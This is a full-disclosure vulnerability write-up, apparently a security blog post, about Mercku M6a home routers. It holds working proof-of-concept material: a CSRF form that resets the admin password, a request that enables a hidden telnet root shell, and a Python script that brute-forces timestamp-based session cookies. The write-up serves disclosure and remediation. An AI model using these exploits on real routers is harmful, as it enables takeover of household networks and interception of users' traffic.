Merck'd-U!

- 6 mins read

Request for CVE and full disclosure of 0-Click/1-Click RCE in default ISP routers (Mercku M6a)

Introduction

Router vulnerabilities continue to pose significant threats to home networks. Today, I’ll document a series of critical flaws discovered in Mercku routers, specifically the M6a model, that could allow attackers to achieve remote code execution with minimal effort. This has been tested and confirmed against version 2.1.0 of the official firmware. This is also an informal escalation for CVEs for these vulnerabilities. (CVE Request 1744791)

Mercku Router Family

Mercku is a company based out of Canada that provides ISPs prebuilt routers for its consumers as well as sells these devices directly to end users. Mercku seems to be the distributor and marketer of a Chinese development team that produces the devices. The ISPs are Start.ca, FibreStream, Innsys, RealNett, Orion Telekom, and Kelcom and potentially others. The CEO Shi Ge contact email ge.shi@foxmail.com listed on the FCCID submission has been notified starting in October 6th 2024 and multiple times after with responsible disclosure requests. There has been no response or acknoledgement yet. Listed ISPs have also been notified. Mercku also seems to violate the GPL license of the OpenWrt code they based their product on.

The Vulnerability Chain

What makes this discovery particularly alarming is how multiple vulnerabilities combine into a devastating attack chain.

Vulnerability CSRF in password change:

The first link in the chain is a classic Cross-Site Request Forgery (CSRF) vulnerability in the password change functionality. This allows an attacker to force a password reset without the user’s knowledge or consent.

The router’s web interface lacks proper CSRF protection, allowing an attacker to craft a malicious request that appears legitimate to the router when executed by the logged-in user. The attacker can force a admin password reset without the user knowing.

Proof of Concept:

<html>
  <body>
    <form action="http://192.168.127.1/app" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;method&quot;&#58;&quot;mesh&#46;config&#46;admin&#46;update&quot;&#44;&quot;params&quot;&#58;&#123;&quot;password&quot;&#58;&quot;abcd1234&quot;&#125;&#125;" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact: CVSSv3.1 AV:A/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H

An attacker on the local network can hijack administrative access.

Hidden Telnet Backdoor

Once administrative access is gained, the real danger emerges. Mercku routers contain a hidden endpoint that enables a telnet server.

Buried in the advanced settings is an undocumented API call that activates telnet access. You can access this unlisted page by navigating your browser to http://192.168.127.1/web/advance/telnet. This isn’t just a debugging feature it’s a full root shell waiting to be enabled.

Proof of Concept:

POST /app HTTP/1.1
Host: http://192.168.127.1
Content-Length: 67
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.127.1
Referer: http://192.168.127.1/web/advance/telnet
Accept-Encoding: gzip, deflate, br
Cookie: session=s1591239132
Connection: keep-alive

{"method":"router.telnet.enabled.update","params":{"enabled":true}}

Impact: CVSSv3.1 AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N

Administrative users can create persistent backdoors, maintaining access even after password changes.

Root Privilege Escalation

The telnet server doesn’t just provide access. It logs you in as root automatically when using the web admin password. This transforms a web interface compromise into full system control.

The Root Shell:

[attacker@desktop.local][~]% telnet 192.168.127.1
Trying 192.168.127.1...
Connected to 192.168.127.1.
Escape character is '^]'.

Mercku login: root
Password:

BusyBox v1.25.1 () built-in shell (ash)
═════════════════════════════════════════════════════════════════════════════════════════
███╗   ███╗███████╗██████╗  ██████╗██╗  ██╗██╗   ██╗    ████████╗███████╗ ██████╗██╗  ██╗
████╗ ████║██╔════╝██╔══██╗██╔════╝██║ ██╔╝██║   ██║    ╚══██╔══╝██╔════╝██╔════╝██║  ██║
██╔████╔██║█████╗  ██████╔╝██║     █████╔╝ ██║   ██║       ██║   █████╗  ██║     ███████║
██║╚██╔╝██║██╔══╝  ██╔══██╗██║     ██╔═██╗ ██║   ██║       ██║   ██╔══╝  ██║     ██╔══██║
██║ ╚═╝ ██║███████╗██║  ██║╚██████╗██║  ██╗╚██████╔╝       ██║   ███████╗╚██████╗██║  ██║
╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝ ╚═════╝        ╚═╝   ╚══════╝ ╚═════╝╚═╝  ╚═╝
═════════════════════════════════════════════════════════════════════════════════════════
* Image information:
*   Customer ID       = 0001
*   Product Model     = M8
*   Build Environment = 0
*   Image version     = 2.1.0
*   Web version       = m6a-v2.1.0
*   Build Time        = 2023-11-21T11:33:20+00:00
*
* More information:
*   https://www.mercku.com
═════════════════════════════════════════════════════════════════════════════════════════
root@Mercku:~#

Impact: CVSSv3.1 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Web admin access translates to complete device compromise, enabling traffic interception, lateral movement, and unrestricted code execution.

Weak Session Tokens

The authentication system uses predictable session tokens based on timestamps, making brute-force attacks feasible.

Session cookies follow the pattern s{timestamp}, allowing attackers to work backwards from the current time to find valid sessions. There is no rate limiting or secure cryptographic algorithm for session generation.

Proof of Concept:

import requests
import time

cookie_current_time = int(time.time())

headers = {
    'Host': '192.168.127.1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:125.0) Gecko/20100101 Firefox/125.0',
    'Accept': 'application/json, text/plain, */*',
    'Accept-Language': 'en-US,en;q=0.5',
    'Content-Type': 'application/json;charset=utf-8',
    'Origin': 'http://192.168.127.1',
    'Connection': 'keep-alive',
    'Referer': 'http://192.168.127.1/web/login',
}
 
json_data = {
    'method': 'mesh.mode.get',
}
 
while (cookie_current_time > 0):
    cookies = {
        'session': f's{cookie_current_time}',
    }

    response = requests.post('http://192.168.127.1/app', cookies=cookies, headers=headers, json=json_data, verify=False)
    print(f'Cookie: s{cookie_current_time}, Response: {response.status_code}')
    cookie_current_time -= 1

Sample brute.py output:

Cookie: s1728244441, Response: 401
Cookie: s1728244440, Response: 401
Cookie: s1728244439, Response: 200
Cookie: s1728244437, Response: 401

Impact: CVSSv3.1 AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Sessions can be hijacked through brute-forcing, or stolen from local browser cache.

Eternal Sessions

Adding insult to injury, session tokens persist indefinitely.

Proof of Concept:

POST /app HTTP/1.1
Host: 192.168.127.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=utf-8
Content-Length: 26
Origin: http://192.168.127.1
DNT: 1
Connection: keep-alive
Referer: http://192.168.127.1/web/login
Cookie: session=s1591239076

{"method":"mesh.mode.get"}

Note: Unix timestamp of Thu Jun 04 02:51:16 2020 UTC while today’s date is 1728249261 or Sun, 06 Oct 2024 21:14:21 UTC

Impact: Attacks can reuse very old sessions.

This may allow captured credentials or forged sessions to exist well beyond expected authentication time, including surviving router reboots.

The Complete Attack Chain

Combining these vulnerabilities creates a nightmare scenario:

  1. LAN Attack: An attacker on the local network brute-forces session tokens or exploits CSRF to change the admin password
  2. Enable Backdoor: Use admin access to activate the hidden telnet server
  3. Root Access: Connect via telnet using the admin password to gain root shell
  4. Network Domination: From root, intercept traffic, modify settings, or pivot to other devices

This is for the default configuration. The CSRF could be completed over the internet, but with limited availablity to login with the changed password.

Some users who have allowed access to the management interface from the internet have been discovered on shodan, around 695 hosts at the time of writing.

This can be accomplished in 0-clicks (brute-force only) or 1-click (CSRF) scenarios. Automation and weaponization of the PoC code described in this disclosure is an exercise for the reader.

Implications and Recommendations

These vulnerabilities expose fundamental security failures in Mercku routers. With default configurations, anyone on the WiFi could potentially take control of the router. If remote management is enabled, attacks could come from the internet.

Immediate action is required to patch this vulnerability and prevent potential exploitation by attackers.

Remediation Advice

  • Implement proper CSRF protection
  • Remove or secure hidden endpoints
  • Use cryptographically secure session generation
  • Enforce session expiration
  • Follow GPL requirements for OpenWrt modifications

Full Disclosure

Due to the lack of communications with Mercku and their compromised support portal. I have been forced to move towards full disclosing of these security bugs to better inform the users of these devices, the ISPs that issue them as default, and to hold the company accountable.

Gr33tz

Happy (ethical) hacking!